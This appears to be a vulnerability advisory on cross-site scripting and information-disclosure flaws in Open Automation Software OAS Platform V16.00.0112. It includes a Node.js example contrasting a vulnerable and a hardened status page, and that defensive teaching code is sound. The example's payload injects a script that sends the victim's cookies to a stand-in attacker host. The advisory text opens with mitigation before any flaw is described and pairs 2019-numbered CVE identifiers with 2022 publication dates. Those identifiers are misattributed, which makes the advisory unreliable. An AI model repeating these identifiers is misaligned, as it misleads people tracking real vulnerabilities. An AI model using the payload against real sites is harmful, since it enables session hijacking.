The server should properly sanitize user-provided data before using it in the actual communication, and should not rely on a single layer of filtering.
In addition, input validation should be applied to network communication so that requests crafted by an attacker are rejected rather than processed. If possible, avoid using the unencrypted or default protocol for communication. If communication over a non-secure channel is required, then at least restrict access to the service with firewall rules.

CVE-2019-1238 has been assigned to this vulnerability. A patch is currently not available.

A cross-site scripting (XSS) vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. An attacker who can get malicious input accepted by the web application can have that input rendered as script in another user's browser.
Concretely, the attacker supplies input that the application later includes in a page it serves; because the input is neither validated on the way in nor encoded on the way out, the victim's browser treats the injected markup as part of the application and executes it in the context of that user's session.
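The reflected-XSS pattern described above, together with the validate-then-encode fix the mitigation paragraph calls for, as an added example in Node.js. This is not OAS Platform code and says nothing about how the OAS Engine actually handles SecureTransferFiles requests; the status-page handler, the file-name allowlist and the payload are assumptions constructed for illustration.

```javascript
// Added example, not OAS Platform code. A minimal file-transfer status page
// that reflects a user-supplied file name, shown once vulnerable and once
// hardened. The handler shape, allowlist and payload are assumptions.

// Constructed payload of the kind an attacker would submit as a file name.
const PAYLOAD =
  'report.csv"><script>document.location="http://attacker.invalid/?c="+document.cookie</script>';

// Vulnerable: the name is concatenated straight into the HTML response, in
// both an attribute context (href) and a text context (link body).
function vulnerableStatusPage(fileName) {
  return `<p>Transfer complete: <a href="/download?name=${fileName}">${fileName}</a></p>`;
}

// Output encoding: neutralise the five characters that can break out of an
// HTML text or attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Input validation: accept only a single path component made of safe
// characters (assumed allowlist). A leading alphanumeric also rules out
// "." and ".." style names, so traversal never reaches the file layer.
const SAFE_FILE_NAME = /^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$/;

function validateFileName(fileName) {
  if (typeof fileName !== 'string' || !SAFE_FILE_NAME.test(fileName)) {
    throw new Error('invalid file name');
  }
  return fileName;
}

// Hardened: reject bad input first, then encode for each output context.
// Validation alone is bypassed the day the allowlist is loosened; encoding
// alone does nothing about traversal or other misuse of the name. Use both.
function hardenedStatusPage(fileName) {
  const name = validateFileName(fileName);
  const href = '/download?name=' + encodeURIComponent(name);
  return `<p>Transfer complete: <a href="${escapeHtml(href)}">${escapeHtml(name)}</a></p>`;
}

// Crude detector used to compare the two handlers: is there a live <script
// tag in the rendered page?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Demonstration when run directly.
console.log('vulnerable:', containsScriptTag(vulnerableStatusPage(PAYLOAD)));
try {
  hardenedStatusPage(PAYLOAD);
} catch (e) {
  console.log('hardened rejected payload:', e.message);
}
console.log('hardened, benign name:', hardenedStatusPage('report.csv'));
```

Even if the validation step were dropped, `escapeHtml` on its own turns the payload's `<script>` into `&lt;script&gt;`, which the browser renders as text rather than executing; the allowlist is the second, independent layer that also keeps the name usable as a safe path component.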

CVE-2019-1239 has been assigned to this vulnerability. A patch is currently not available.

An information disclosure vulnerability exists in the OAS Engine SecureTransferFiles functionality of Open Automation Software OAS Platform V16.00.0112. An attacker can send a crafted request to an affected system; because the server does not properly validate user input, it returns sensitive information in its response.

Vulnerable package:

Open Automation Software OAS Platform V16.00.0112

Timeline

Published on: 05/25/2022 21:15:00 UTC
Last modified on: 06/03/2022 12:17:00 UTC
